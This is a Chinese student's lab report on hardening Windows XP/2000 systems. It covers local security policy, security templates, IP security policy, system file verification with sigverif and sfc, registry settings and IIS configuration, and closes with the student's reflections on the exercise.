2、具体本实验中,要求能够在Windows XP / 2000 Professional / 2000 Server三种版本的Windows操作系统平台上进行初级、中级、高级安全配置方案的各项策略,掌握系统安全性的一般性防御技术。
实验步骤
一、在管理工具中可以找到“本地安全策略”,主界面如图
7-6所示。
可以配置四类安全策略:帐户策略、本地策略、公钥策略和IP安全策略。
在默认的情况下,这些策略都是没有开启的。
1.开启账户策略
2.开启本地策略
3.受限制的组
4.系统服务
二、每个人在自己的虚拟机系统上,通过MMC管理控制台
将上步中安全模板(Security Template)和安全配置和分析(Security Configuration and Analysis)管理单元的配置结果保存并使用“安全设置”扩展为“组策略”导入到本地安全策略中;
三、每个人在自己的虚拟机系统上,基于上步导入的安全
模板配置,在“本地安全策略”管理单元中进一步设置本机的“IP安全策略”配置,保存并将自定义IP安全策略文件通过“指派”激活,然后从本机系统进行相关的网络验证;
四、每个人在自己的虚拟机系统上,使用MS提供的
Windows File Protection,WFP功能对将本机已安装的系统文件的来源(签名)和版本进行验证,(注:该功能可避免以.sys/.dll/.ocx/.ttf/.fon/.exe为扩展名的系统文件被病毒、木马或正在安装的某个软件包所覆盖。
即系统文件的完整性校验)具体在MS-DOS窗口中使用如下两个命令(此次试验我是再自己WIN7系统主机上做的):文件签名检查:sigverif.exe,文件完整性检查:sfc.exe
五、每个人在自己的虚拟机系统上,使用MS提供的注册
表编辑器在虚拟机Windows 2000 Server SP0操作系统中进行初级配置方案的各项规则设置,并通过本机验证其效果;
六、每个人在自己的虚拟机系统上,对虚拟机Windows
2000 Server SP0操作系统中的IIS进行安全防御配置;IIS 在控制面板中的管理工具的Internet信SERVECE管理器,双击进入此界面:
实验心得
本次实验不像前两次试验一样卡到某一步就做不下去,只是按照老师的幻灯片做就可以了只是有一些繁琐,但是幻灯片上的东西不够全面细致,而且是第一次做这个安全配置,所以好多东西找不到,只得一边百度一边做。
有很多地方都是同学告诉怎样做才做的,还应该多加练习记住才好。